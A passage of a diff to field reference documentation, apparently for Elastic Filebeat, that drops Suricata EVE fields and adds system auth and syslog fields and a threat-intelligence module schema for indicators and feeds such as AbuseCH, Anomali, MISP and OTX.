-type: alias - -alias to: destination.ip +The home folder for the new user. -- -*`suricata.eve.icmp_code`*:: +*`system.auth.useradd.shell`*:: + -- -type: long +The default shell for the new user. -- - -*`suricata.eve.http.status`*:: +*`system.auth.useradd.name`*:: + -- type: alias -alias to: http.response.status_code +alias to: user.name -- -*`suricata.eve.http.redirect`*:: +*`system.auth.useradd.uid`*:: + -- -type: keyword +type: alias + +alias to: user.id -- -*`suricata.eve.http.http_user_agent`*:: +*`system.auth.useradd.gid`*:: + -- type: alias -alias to: user_agent.original +alias to: group.id -- -*`suricata.eve.http.protocol`*:: -+ --- -type: keyword +[float] +=== groupadd --- +Fields specific to events created by the `groupadd` command. -*`suricata.eve.http.http_refer`*:: + + +*`system.auth.groupadd.name`*:: + -- type: alias -alias to: http.request.referrer +alias to: group.name -- -*`suricata.eve.http.url`*:: +*`system.auth.groupadd.gid`*:: + -- type: alias -alias to: url.original +alias to: group.id -- -*`suricata.eve.http.hostname`*:: +[float] +=== syslog + +Contains fields from the syslog system logs. + + + +*`system.syslog.timestamp`*:: + -- type: alias -alias to: url.domain +alias to: @timestamp -- -*`suricata.eve.http.length`*:: +*`system.syslog.hostname`*:: + -- type: alias -alias to: http.response.body.bytes +alias to: host.hostname -- -*`suricata.eve.http.http_method`*:: +*`system.syslog.program`*:: + -- type: alias -alias to: http.request.method +alias to: process.name -- -*`suricata.eve.http.http_content_type`*:: +*`system.syslog.pid`*:: + -- -type: keyword +type: alias + +alias to: process.pid -- -*`suricata.eve.in_iface`*:: +*`system.syslog.message`*:: + -- -type: keyword +type: alias + +alias to: message -- +[[exported-fields-threatintel]] +== threatintel fields -*`suricata.eve.alert.metadata`*:: -+ --- -Metadata about the alert. +Threat intelligence Filebeat Module. -type: flattened --- -*`suricata.eve.alert.category`*:: +[float] +=== threatintel + +Fields from the threatintel Filebeat module. + + + +*`threatintel.indicator.first_seen`*:: + -- +The date and time when intelligence source first reported sighting this indicator. + + type: keyword -- -*`suricata.eve.alert.severity`*:: +*`threatintel.indicator.last_seen`*:: + -- -type: alias +The date and time when intelligence source last reported sighting this indicator. -alias to: event.severity + +type: date -- -*`suricata.eve.alert.rev`*:: +*`threatintel.indicator.sightings`*:: + -- -type: long +Number of times this indicator was observed conducting threat activity. --- -*`suricata.eve.alert.gid`*:: -+ --- type: long -- -*`suricata.eve.alert.signature`*:: +*`threatintel.indicator.type`*:: + -- +Type of indicator as represented by Cyber Observable in STIX 2.0. Expected values + * autonomous-system + * artifact + * directory + * domain-name + * email-addr + * file + * ipv4-addr + * ipv6-addr + * mac-addr + * mutex + * process + * software + * url + * user-account + * windows-registry-key + * x-509-certificate + + type: keyword -- -*`suricata.eve.alert.action`*:: +*`threatintel.indicator.description`*:: + -- -type: alias +Describes the type of action conducted by the threat. -alias to: event.outcome + +type: keyword -- -*`suricata.eve.alert.signature_id`*:: +*`threatintel.indicator.scanner_stats`*:: + -- -type: long +Count of AV/EDR vendors that successfully detected malicious file or URL. --- +type: long +-- -*`suricata.eve.ssh.client.proto_version`*:: +*`threatintel.indicator.provider`*:: + -- -type: keyword +Identifies the name of the intelligence provider. --- -*`suricata.eve.ssh.client.software_version`*:: -+ --- type: keyword -- - -*`suricata.eve.ssh.server.proto_version`*:: +*`threatintel.indicator.confidence`*:: + -- -type: keyword +Identifies the confidence rating assigned by the provider using STIX confidence scales. Expected values + * Not Specified, None, Low, Medium, High + * 0-10 + * Admirality Scale (1-6) + * DNI Scale (5-95) + * WEP Scale (Impossible - Certain) --- -*`suricata.eve.ssh.server.software_version`*:: -+ --- type: keyword -- - - -*`suricata.eve.stats.capture.kernel_packets`*:: +*`threatintel.indicator.module`*:: + -- -type: long +Identifies the name of specific module this data is coming from. --- -*`suricata.eve.stats.capture.kernel_drops`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.capture.kernel_ifdrops`*:: +*`threatintel.indicator.dataset`*:: + -- -type: long +Identifies the name of specific dataset from the intelligence source. --- -*`suricata.eve.stats.uptime`*:: -+ --- -type: long +type: keyword -- - -*`suricata.eve.stats.detect.alert`*:: +*`threatintel.indicator.ip`*:: + -- -type: long - --- +Identifies a threat indicator as an IP address (irrespective of direction). -*`suricata.eve.stats.http.memcap`*:: -+ --- -type: long +type: ip -- -*`suricata.eve.stats.http.memuse`*:: +*`threatintel.indicator.domain`*:: + -- -type: long +Identifies a threat indicator as a domain (irrespective of direction). --- +type: keyword -*`suricata.eve.stats.file_store.open_files`*:: -+ -- -type: long +*`threatintel.indicator.port`*:: ++ -- +Identifies a threat indicator as a port number (irrespective of direction). -*`suricata.eve.stats.defrag.max_frag_hits`*:: -+ --- type: long -- - -*`suricata.eve.stats.defrag.ipv4.timeouts`*:: +*`threatintel.indicator.email.address`*:: + -- -type: long +Identifies a threat indicator as an email address (irrespective of direction). --- -*`suricata.eve.stats.defrag.ipv4.fragments`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.defrag.ipv4.reassembled`*:: +*`threatintel.indicator.marking.tlp`*:: + -- -type: long +Traffic Light Protocol sharing markings. Expected values are: + * White + * Green + * Amber + * Red --- +type: keyword -*`suricata.eve.stats.defrag.ipv6.timeouts`*:: -+ -- -type: long --- -*`suricata.eve.stats.defrag.ipv6.fragments`*:: +*`threatintel.indicator.matched.atomic`*:: + -- -type: long +Identifies the atomic indicator that matched a local environment endpoint or network event. --- -*`suricata.eve.stats.defrag.ipv6.reassembled`*:: -+ --- -type: long +type: keyword -- - -*`suricata.eve.stats.flow.tcp_reuse`*:: +*`threatintel.indicator.matched.field`*:: + -- -type: long +Identifies the field of the atomic indicator that matched a local environment endpoint or network event. --- -*`suricata.eve.stats.flow.udp`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.flow.memcap`*:: +*`threatintel.indicator.matched.type`*:: + -- -type: long - --- +Identifies the type of the atomic indicator that matched a local environment endpoint or network event. -*`suricata.eve.stats.flow.emerg_mode_entered`*:: -+ --- -type: long --- +type: keyword -*`suricata.eve.stats.flow.emerg_mode_over`*:: -+ -- -type: long --- -*`suricata.eve.stats.flow.tcp`*:: +*`threatintel.indicator.as.number`*:: + -- +Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. + type: long +example: 15169 + -- -*`suricata.eve.stats.flow.icmpv6`*:: +*`threatintel.indicator.as.organization.name`*:: + -- -type: long +Organization name. --- +type: keyword -*`suricata.eve.stats.flow.icmpv4`*:: -+ --- -type: long +example: Google LLC -- -*`suricata.eve.stats.flow.spare`*:: +*`threatintel.indicator.as.organization.name.text`*:: + -- -type: long +type: text -- -*`suricata.eve.stats.flow.memuse`*:: + +*`threatintel.indicator.registry.data.strings`*:: + -- -type: long +Content when writing string types. Populated as an array when writing string data to the registry. For single string registry types (REG_SZ, REG_EXPAND_SZ), this should be an array with one string. For sequences of string with REG_MULTI_SZ, this array will be variable length. For numeric data, such as REG_DWORD and REG_QWORD, this should be populated with the decimal representation (e.g `"1"`). --- +type: keyword -*`suricata.eve.stats.tcp.pseudo_failed`*:: -+ --- -type: long +example: ["C:\rta\red_ttp\bin\myapp.exe"] -- -*`suricata.eve.stats.tcp.ssn_memcap_drop`*:: +*`threatintel.indicator.registry.path`*:: + -- -type: long +Full path, including hive, key and value --- +type: keyword -*`suricata.eve.stats.tcp.insert_data_overlap_fail`*:: -+ --- -type: long +example: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winword.exe\Debugger -- -*`suricata.eve.stats.tcp.sessions`*:: +*`threatintel.indicator.registry.value`*:: + -- -type: long +Name of the value written. --- +type: keyword -*`suricata.eve.stats.tcp.pseudo`*:: -+ --- -type: long +example: Debugger -- -*`suricata.eve.stats.tcp.synack`*:: +*`threatintel.indicator.registry.key`*:: + -- -type: long +Registry key value --- +type: keyword -*`suricata.eve.stats.tcp.insert_data_normal_fail`*:: -+ -- -type: long --- -*`suricata.eve.stats.tcp.syn`*:: +*`threatintel.indicator.geo.geo.city_name`*:: + -- -type: long +City name. --- +type: keyword -*`suricata.eve.stats.tcp.memuse`*:: -+ --- -type: long +example: Montreal -- -*`suricata.eve.stats.tcp.invalid_checksum`*:: +*`threatintel.indicator.geo.geo.country_iso_code`*:: + -- -type: long +Country ISO code. --- +type: keyword -*`suricata.eve.stats.tcp.segment_memcap_drop`*:: -+ --- -type: long +example: CA -- -*`suricata.eve.stats.tcp.overlap`*:: +*`threatintel.indicator.geo.geo.country_name`*:: + -- -type: long +Country name. --- +type: keyword -*`suricata.eve.stats.tcp.insert_list_fail`*:: -+ --- -type: long +example: Canada -- -*`suricata.eve.stats.tcp.rst`*:: +*`threatintel.indicator.geo.geo.location`*:: + -- -type: long +Longitude and latitude. --- +type: geo_point -*`suricata.eve.stats.tcp.stream_depth_reached`*:: -+ --- -type: long +example: { "lon": -73.614830, "lat": 45.505918 } -- -*`suricata.eve.stats.tcp.reassembly_memuse`*:: +*`threatintel.indicator.geo.geo.region_iso_code`*:: + -- -type: long +Region ISO code. --- +type: keyword -*`suricata.eve.stats.tcp.reassembly_gap`*:: -+ --- -type: long +example: CA-QC -- -*`suricata.eve.stats.tcp.overlap_diff_data`*:: +*`threatintel.indicator.geo.geo.region_name`*:: + -- -type: long +Region name. + +type: keyword + +example: Quebec -- -*`suricata.eve.stats.tcp.no_flow`*:: +*`threatintel.indicator.file.pe.imphash`*:: + -- -type: long +A hash of the imports in a PE file. An imphash -- or import hash -- can be used to fingerprint binaries even after recompilation or other code-level transformations have occurred, which would change more traditional hash values. Learn more at https://www.fireeye.com/blog/threat-research/2014/01/tracking-malware-import-hashing.html. --- +type: keyword +example: 0c6803c4e922103c4dca5963aad36ddf -*`suricata.eve.stats.decoder.avg_pkt_size`*:: -+ -- -type: long --- -*`suricata.eve.stats.decoder.bytes`*:: + +*`threatintel.indicator.file.hash.tlsh`*:: + -- -type: long +The file's import tlsh, if available. --- -*`suricata.eve.stats.decoder.tcp`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.decoder.raw`*:: +*`threatintel.indicator.file.hash.ssdeep`*:: + -- -type: long +The file's ssdeep hash, if available. --- -*`suricata.eve.stats.decoder.ppp`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.decoder.vlan_qinq`*:: +*`threatintel.indicator.file.hash.md5`*:: + -- -type: long +The file's md5 hash, if available. --- -*`suricata.eve.stats.decoder.null`*:: -+ --- -type: long +type: keyword -- - -*`suricata.eve.stats.decoder.ltnull.unsupported_type`*:: +*`threatintel.indicator.file.hash.sha1`*:: + -- -type: long +The file's sha1 hash, if available. --- -*`suricata.eve.stats.decoder.ltnull.pkt_too_small`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.decoder.invalid`*:: +*`threatintel.indicator.file.hash.sha256`*:: + -- -type: long +The file's sha256 hash, if available. --- -*`suricata.eve.stats.decoder.gre`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.decoder.ipv4`*:: +*`threatintel.indicator.file.hash.sha512`*:: + -- -type: long +The file's sha512 hash, if available. --- -*`suricata.eve.stats.decoder.ipv6`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.decoder.pkts`*:: +*`threatintel.indicator.file.type`*:: + -- -type: long +The file type --- -*`suricata.eve.stats.decoder.ipv6_in_ipv6`*:: -+ --- -type: long +type: keyword -- - -*`suricata.eve.stats.decoder.ipraw.invalid_ip_version`*:: +*`threatintel.indicator.file.size`*:: + -- -type: long +The file's total size --- -*`suricata.eve.stats.decoder.pppoe`*:: -+ --- type: long -- -*`suricata.eve.stats.decoder.udp`*:: +*`threatintel.indicator.file.name`*:: + -- -type: long +The file's name --- +type: keyword -*`suricata.eve.stats.decoder.dce.pkt_too_small`*:: -+ -- -type: long --- -*`suricata.eve.stats.decoder.vlan`*:: +*`threatintel.indicator.url.domain`*:: + -- -type: long +Domain of the url, such as "www.elastic.co". --- -*`suricata.eve.stats.decoder.sctp`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.decoder.max_pkt_size`*:: +*`threatintel.indicator.url.extension`*:: + -- -type: long +The field contains the file extension from the original request --- -*`suricata.eve.stats.decoder.teredo`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.decoder.mpls`*:: +*`threatintel.indicator.url.fragment`*:: + -- -type: long +Portion of the url after the `#`, such as "top". --- -*`suricata.eve.stats.decoder.sll`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.decoder.icmpv6`*:: +*`threatintel.indicator.url.full`*:: + -- -type: long +If full URLs are important to your use case, they should be stored in `url.full`, whether this field is reconstructed or present in the event source. --- -*`suricata.eve.stats.decoder.icmpv4`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.decoder.erspan`*:: +*`threatintel.indicator.url.original`*:: + -- -type: long +Unmodified original url as seen in the event source. Note that in network monitoring, the observed URL may be a full URL, whereas in access logs, the URL is often just represented as a path. This field is meant to represent the URL as it was observed, complete or not. --- -*`suricata.eve.stats.decoder.ethernet`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.decoder.ipv4_in_ipv6`*:: +*`threatintel.indicator.url.password`*:: + -- -type: long +Password of the request. --- -*`suricata.eve.stats.decoder.ieee8021ah`*:: -+ --- -type: long +type: keyword -- - -*`suricata.eve.stats.dns.memcap_global`*:: +*`threatintel.indicator.url.path`*:: + -- -type: long +Path of the request, such as "/search". --- -*`suricata.eve.stats.dns.memcap_state`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.dns.memuse`*:: +*`threatintel.indicator.url.port`*:: + -- -type: long - --- +Port of the request, such as 443. -*`suricata.eve.stats.flow_mgr.rows_busy`*:: -+ --- type: long +format: string + -- -*`suricata.eve.stats.flow_mgr.flows_timeout`*:: +*`threatintel.indicator.url.query`*:: + -- -type: long +The query field describes the query string of the request, such as "q=elasticsearch". The `?` is excluded from the query string. If a URL contains no `?`, there is no query field. If there is a `?` but no query, the query field exists with an empty string. The `exists` query can be used to differentiate between the two cases. --- -*`suricata.eve.stats.flow_mgr.flows_notimeout`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.flow_mgr.rows_skipped`*:: +*`threatintel.indicator.url.registered_domain`*:: + -- -type: long +The highest registered url domain, stripped of the subdomain. For example, the registered domain for "foo.example.com" is "example.com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last two labels will not work well for TLDs such as "co.uk". --- -*`suricata.eve.stats.flow_mgr.closed_pruned`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.flow_mgr.new_pruned`*:: +*`threatintel.indicator.url.scheme`*:: + -- -type: long +Scheme of the request, such as "https". --- -*`suricata.eve.stats.flow_mgr.flows_removed`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.flow_mgr.bypassed_pruned`*:: +*`threatintel.indicator.url.subdomain`*:: + -- -type: long +The subdomain portion of a fully qualified domain name includes all of the names except the host name under the registered_domain. In a partially qualified domain, or if the the qualification level of the full name cannot be determined, subdomain contains all of the names below the registered domain. For example the subdomain portion of "www.east.mydomain.co.uk" is "east". If the domain has multiple levels of subdomain, such as "sub2.sub1.example.com", the subdomain field should contain "sub2.sub1", with no trailing period. --- -*`suricata.eve.stats.flow_mgr.est_pruned`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.flow_mgr.flows_timeout_inuse`*:: +*`threatintel.indicator.url.top_level_domain`*:: + -- -type: long +The effective top level domain (eTLD), also known as the domain suffix, is the last part of the domain name. For example, the top level domain for example.com is "com". This value can be determined precisely with a list like the public suffix list (http://publicsuffix.org). Trying to approximate this by simply taking the last label will not work well for effective TLDs such as "co.uk". --- -*`suricata.eve.stats.flow_mgr.flows_checked`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.flow_mgr.rows_maxlen`*:: +*`threatintel.indicator.url.username`*:: + -- -type: long +Username of the request. --- -*`suricata.eve.stats.flow_mgr.rows_checked`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.flow_mgr.rows_empty`*:: + +*`threatintel.indicator.x509.serial_number`*:: + -- -type: long +Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. --- +type: keyword +example: 55FBB9C7DEBF09809D12CCAA +-- -*`suricata.eve.stats.app_layer.flow.tls`*:: +*`threatintel.indicator.x509.issuer`*:: + -- -type: long +Name of issuing certificate authority. Could be either Distinguished Name (DN) or Common Name (CN), depending on source. --- +type: keyword -*`suricata.eve.stats.app_layer.flow.ftp`*:: -+ --- -type: long +example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance Server CA -- -*`suricata.eve.stats.app_layer.flow.http`*:: +*`threatintel.indicator.x509.subject`*:: + -- -type: long +Name of the certificate subject entity. Could be either Distinguished Name (DN) or Common Name (CN), depending on source. --- +type: keyword -*`suricata.eve.stats.app_layer.flow.failed_udp`*:: -+ --- -type: long +example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net -- -*`suricata.eve.stats.app_layer.flow.dns_udp`*:: +*`threatintel.indicator.x509.alternative_names`*:: + -- -type: long +List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. --- +type: keyword -*`suricata.eve.stats.app_layer.flow.dns_tcp`*:: -+ --- -type: long +example: *.elastic.co -- -*`suricata.eve.stats.app_layer.flow.smtp`*:: -+ --- -type: long +[float] +=== abusemalware --- +Fields for AbuseCH Malware Threat Intel -*`suricata.eve.stats.app_layer.flow.failed_tcp`*:: -+ --- -type: long --- -*`suricata.eve.stats.app_layer.flow.msn`*:: +*`threatintel.abusemalware.file_type`*:: + -- -type: long +File type guessed by URLhaus. --- -*`suricata.eve.stats.app_layer.flow.ssh`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.app_layer.flow.imap`*:: +*`threatintel.abusemalware.signature`*:: + -- -type: long +Malware familiy. --- -*`suricata.eve.stats.app_layer.flow.dcerpc_udp`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.app_layer.flow.dcerpc_tcp`*:: +*`threatintel.abusemalware.urlhaus_download`*:: + -- -type: long +Location (URL) where you can download a copy of this file. --- -*`suricata.eve.stats.app_layer.flow.smb`*:: -+ --- -type: long +type: keyword -- - -*`suricata.eve.stats.app_layer.tx.tls`*:: +*`threatintel.abusemalware.virustotal.result`*:: + -- -type: long +AV detection ration. --- -*`suricata.eve.stats.app_layer.tx.ftp`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.app_layer.tx.http`*:: +*`threatintel.abusemalware.virustotal.percent`*:: + -- -type: long +AV detection in percent. --- -*`suricata.eve.stats.app_layer.tx.dns_udp`*:: -+ --- -type: long +type: float -- -*`suricata.eve.stats.app_layer.tx.dns_tcp`*:: +*`threatintel.abusemalware.virustotal.link`*:: + -- -type: long +Link to the Virustotal report. --- -*`suricata.eve.stats.app_layer.tx.smtp`*:: -+ --- -type: long +type: keyword -- -*`suricata.eve.stats.app_layer.tx.ssh`*:: -+ --- -type: long +[float] +=== abuseurl --- +Fields for AbuseCH Malware Threat Intel -*`suricata.eve.stats.app_layer.tx.dcerpc_udp`*:: -+ --- -type: long --- -*`suricata.eve.stats.app_layer.tx.dcerpc_tcp`*:: +*`threatintel.abuseurl.id`*:: + -- -type: long +The ID of the url. --- -*`suricata.eve.stats.app_layer.tx.smb`*:: -+ --- -type: long +type: keyword -- - -*`suricata.eve.tls.notbefore`*:: +*`threatintel.abuseurl.urlhaus_reference`*:: + -- -type: date +Link to URLhaus entry. --- -*`suricata.eve.tls.issuerdn`*:: -+ --- type: keyword -- -*`suricata.eve.tls.sni`*:: +*`threatintel.abuseurl.url_status`*:: + -- +The current status of the URL. Possible values are: online, offline and unknown. + + type: keyword -- -*`suricata.eve.tls.version`*:: +*`threatintel.abuseurl.threat`*:: + -- +The threat corresponding to this malware URL. + + type: keyword -- -*`suricata.eve.tls.session_resumed`*:: +*`threatintel.abuseurl.blacklists.surbl`*:: + -- -type: boolean +SURBL blacklist status. Possible values are: listed and not_listed --- -*`suricata.eve.tls.fingerprint`*:: -+ --- type: keyword -- -*`suricata.eve.tls.serial`*:: +*`threatintel.abuseurl.blacklists.spamhaus_dbl`*:: + -- +Spamhaus DBL blacklist status. + + type: keyword -- -*`suricata.eve.tls.notafter`*:: +*`threatintel.abuseurl.reporter`*:: + -- -type: date +The Twitter handle of the reporter that has reported this malware URL (or anonymous). --- -*`suricata.eve.tls.subject`*:: -+ --- type: keyword -- - -*`suricata.eve.tls.ja3s.string`*:: +*`threatintel.abuseurl.larted`*:: + -- -type: keyword +Indicates whether the malware URL has been reported to the hosting provider (true or false) + + +type: boolean -- -*`suricata.eve.tls.ja3s.hash`*:: +*`threatintel.abuseurl.tags`*:: + -- +A list of tags associated with the queried malware URL + + type: keyword -- +[float] +=== anomali -*`suricata.eve.tls.ja3.string`*:: -+ --- -type: keyword +Fields for Anomali Threat Intel --- -*`suricata.eve.tls.ja3.hash`*:: + +*`threatintel.anomali.id`*:: + -- +The ID of the indicator. + + type: keyword -- -*`suricata.eve.app_proto_ts`*:: +*`threatintel.anomali.name`*:: + -- +The name of the indicator. + + type: keyword -- - -*`suricata.eve.flow.bytes_toclient`*:: +*`threatintel.anomali.pattern`*:: + -- -type: alias +The pattern ID of the indicator. -alias to: destination.bytes + +type: keyword -- -*`suricata.eve.flow.start`*:: +*`threatintel.anomali.valid_from`*:: + -- -type: alias +When the indicator was first found or is considered valid. -alias to: event.start + +type: date -- -*`suricata.eve.flow.pkts_toclient`*:: +*`threatintel.anomali.modified`*:: + -- -type: alias +When the indicator was last modified -alias to: destination.packets + +type: date -- -*`suricata.eve.flow.age`*:: +*`threatintel.anomali.labels`*:: + -- -type: long +The labels related to the indicator --- -*`suricata.eve.flow.state`*:: -+ --- type: keyword -- -*`suricata.eve.flow.bytes_toserver`*:: +*`threatintel.anomali.indicator`*:: + -- -type: alias +The value of the indicator, for example if the type is domain, this would be the value. -alias to: source.bytes + +type: keyword -- -*`suricata.eve.flow.reason`*:: +*`threatintel.anomali.description`*:: + -- +A description of the indicator. + + type: keyword -- -*`suricata.eve.flow.pkts_toserver`*:: +*`threatintel.anomali.title`*:: + -- -type: alias +Title describing the indicator. -alias to: source.packets + +type: keyword -- -*`suricata.eve.flow.alerted`*:: +*`threatintel.anomali.content`*:: + -- -type: boolean +Extra text or descriptive content related to the indicator. + + +type: keyword -- -*`suricata.eve.app_proto`*:: +*`threatintel.anomali.type`*:: + -- -type: alias +The indicator type, can for example be "domain, email, FileHash-SHA256". -alias to: network.protocol + +type: keyword -- -*`suricata.eve.tx_id`*:: +*`threatintel.anomali.object_marking_refs`*:: + -- -type: long +The STIX reference object. --- -*`suricata.eve.app_proto_tc`*:: -+ --- type: keyword -- +[float] +=== misp -*`suricata.eve.smtp.rcpt_to`*:: +Fields for MISP Threat Intel + + + +*`threatintel.misp.id`*:: + -- +Attribute ID. + + type: keyword -- -*`suricata.eve.smtp.mail_from`*:: +*`threatintel.misp.orgc_id`*:: + -- +Organization Community ID of the event. + + type: keyword -- -*`suricata.eve.smtp.helo`*:: +*`threatintel.misp.org_id`*:: + -- +Organization ID of the event. + + type: keyword -- -*`suricata.eve.app_proto_expected`*:: +*`threatintel.misp.threat_level_id`*:: + -- -type: keyword +Threat level from 5 to 1, where 1 is the most critical. + + +type: long -- -[[exported-fields-system]] -== System fields +*`threatintel.misp.info`*:: ++ +-- +Additional text or information related to the event. -Module for parsing system log files. +type: keyword +-- -[float] -=== system +*`threatintel.misp.published`*:: ++ +-- +When the event was published. -Fields from the system log files. +type: boolean +-- -[float] -=== auth +*`threatintel.misp.uuid`*:: ++ +-- +The UUID of the event object. -Fields from the Linux authorization logs. +type: keyword +-- -*`system.auth.timestamp`*:: +*`threatintel.misp.date`*:: + -- -type: alias +The date of when the event object was created. -alias to: @timestamp + +type: date -- -*`system.auth.hostname`*:: +*`threatintel.misp.attribute_count`*:: + -- -type: alias +How many attributes are included in a single event object. -alias to: host.hostname + +type: long -- -*`system.auth.program`*:: +*`threatintel.misp.timestamp`*:: + -- -type: alias +The timestamp of when the event object was created. -alias to: process.name + +type: date -- -*`system.auth.pid`*:: +*`threatintel.misp.distribution`*:: + -- -type: alias +Distribution type related to MISP. -alias to: process.pid + +type: keyword -- -*`system.auth.message`*:: +*`threatintel.misp.proposal_email_lock`*:: + -- -type: alias +Settings configured on MISP for email lock on this event object. -alias to: message + +type: boolean -- -*`system.auth.user`*:: +*`threatintel.misp.locked`*:: + -- -type: alias +If the current MISP event object is locked or not. -alias to: user.name --- +type: boolean +-- -*`system.auth.ssh.method`*:: +*`threatintel.misp.publish_timestamp`*:: + -- -The SSH authentication method. Can be one of "password" or "publickey". +At what time the event object was published + +type: date -- -*`system.auth.ssh.signature`*:: +*`threatintel.misp.sharing_group_id`*:: + -- -The signature of the client public key. +The ID of the grouped events or sources of the event. + +type: keyword -- -*`system.auth.ssh.dropped_ip`*:: +*`threatintel.misp.disable_correlation`*:: + -- -The client IP from SSH connections that are open and immediately dropped. +If correlation is disabled on the MISP event object. -type: ip +type: boolean -- -*`system.auth.ssh.event`*:: +*`threatintel.misp.extends_uuid`*:: + -- -The SSH event as found in the logs (Accepted, Invalid, Failed, etc.) +The UUID of the event object it might extend. -example: Accepted +type: keyword -- -*`system.auth.ssh.ip`*:: +*`threatintel.misp.org.id`*:: + -- -type: alias +The organization ID related to the event object. -alias to: source.ip + +type: keyword -- -*`system.auth.ssh.port`*:: +*`threatintel.misp.org.name`*:: + -- -type: alias +The organization name related to the event object. -alias to: source.port --- +type: keyword +-- -*`system.auth.ssh.geoip.continent_name`*:: +*`threatintel.misp.org.uuid`*:: + -- -type: alias +The UUID of the organization related to the event object. -alias to: source.geo.continent_name + +type: keyword -- -*`system.auth.ssh.geoip.country_iso_code`*:: +*`threatintel.misp.org.local`*:: + -- -type: alias +If the event object is local or from a remote source. -alias to: source.geo.country_iso_code + +type: boolean -- -*`system.auth.ssh.geoip.location`*:: +*`threatintel.misp.orgc.id`*:: + -- -type: alias +The Organization Community ID in which the event object was reported from. -alias to: source.geo.location + +type: keyword -- -*`system.auth.ssh.geoip.region_name`*:: +*`threatintel.misp.orgc.name`*:: + -- -type: alias +The Organization Community name in which the event object was reported from. -alias to: source.geo.region_name + +type: keyword -- -*`system.auth.ssh.geoip.city_name`*:: +*`threatintel.misp.orgc.uuid`*:: + -- -type: alias +The Organization Community UUID in which the event object was reported from. -alias to: source.geo.city_name + +type: keyword -- -*`system.auth.ssh.geoip.region_iso_code`*:: +*`threatintel.misp.orgc.local`*:: + -- -type: alias +If the Organization Community was local or synced from a remote source. -alias to: source.geo.region_iso_code + +type: boolean -- -[float] -=== sudo +*`threatintel.misp.attribute.id`*:: ++ +-- +The ID of the attribute related to the event object. -Fields specific to events created by the `sudo` command. +type: keyword +-- -*`system.auth.sudo.error`*:: +*`threatintel.misp.attribute.type`*:: + -- -The error message in case the sudo command failed. +The type of the attribute related to the event object. For example email, ipv4, sha1 and such. -example: user NOT in sudoers +type: keyword -- -*`system.auth.sudo.tty`*:: +*`threatintel.misp.attribute.category`*:: + -- -The TTY where the sudo command is executed. +The category of the attribute related to the event object. For example "Network Activity". + +type: keyword -- -*`system.auth.sudo.pwd`*:: +*`threatintel.misp.attribute.to_ids`*:: + -- -The current directory where the sudo command is executed. +If the attribute should be automatically synced with an IDS. + +type: boolean -- -*`system.auth.sudo.user`*:: +*`threatintel.misp.attribute.uuid`*:: + -- -The target user to which the sudo command is switching. +The UUID of the attribute related to the event. -example: root +type: keyword -- -*`system.auth.sudo.command`*:: +*`threatintel.misp.attribute.event_id`*:: + -- -The command executed via sudo. +The local event ID of the attribute related to the event. + +type: keyword -- -[float] -=== useradd +*`threatintel.misp.attribute.distribution`*:: ++ +-- +How the attribute has been distributed, represented by integer numbers. -Fields specific to events created by the `useradd` command. +type: long +-- -*`system.auth.useradd.home`*:: +*`threatintel.misp.attribute.timestamp`*:: + -- -The home folder for the new user. +The timestamp in which the attribute was attached to the event object. + + +type: date -- -*`system.auth.useradd.shell`*:: +*`threatintel.misp.attribute.comment`*:: + -- -The default shell for the new user. +Comments made to the attribute itself. + + +type: keyword -- -*`system.auth.useradd.name`*:: +*`threatintel.misp.attribute.sharing_group_id`*:: + -- -type: alias +The group ID of the sharing group related to the specific attribute. -alias to: user.name + +type: keyword -- -*`system.auth.useradd.uid`*:: +*`threatintel.misp.attribute.deleted`*:: + -- -type: alias +If the attribute has been removed from the event object. -alias to: user.id + +type: boolean -- -*`system.auth.useradd.gid`*:: +*`threatintel.misp.attribute.disable_correlation`*:: + -- -type: alias +If correlation has been enabled on the attribute related to the event object. -alias to: group.id + +type: boolean -- -[float] -=== groupadd +*`threatintel.misp.attribute.object_id`*:: ++ +-- +The ID of the Object in which the attribute is attached. -Fields specific to events created by the `groupadd` command. +type: keyword +-- -*`system.auth.groupadd.name`*:: +*`threatintel.misp.attribute.object_relation`*:: + -- -type: alias +The type of relation the attribute has with the event object itself. -alias to: group.name + +type: keyword -- -*`system.auth.groupadd.gid`*:: +*`threatintel.misp.attribute.value`*:: + -- -type: alias +The value of the attribute, depending on the type like "url, sha1, email-src". -alias to: group.id + +type: keyword -- [float] -=== syslog +=== otx -Contains fields from the syslog system logs. +Fields for OTX Threat Intel -*`system.syslog.timestamp`*:: +*`threatintel.otx.id`*:: + -- -type: alias +The ID of the indicator. -alias to: @timestamp + +type: keyword -- -*`system.syslog.hostname`*:: +*`threatintel.otx.indicator`*:: + -- -type: alias +The value of the indicator, for example if the type is domain, this would be the value. -alias to: host.hostname + +type: keyword -- -*`system.syslog.program`*:: +*`threatintel.otx.description`*:: + -- -type: alias +A description of 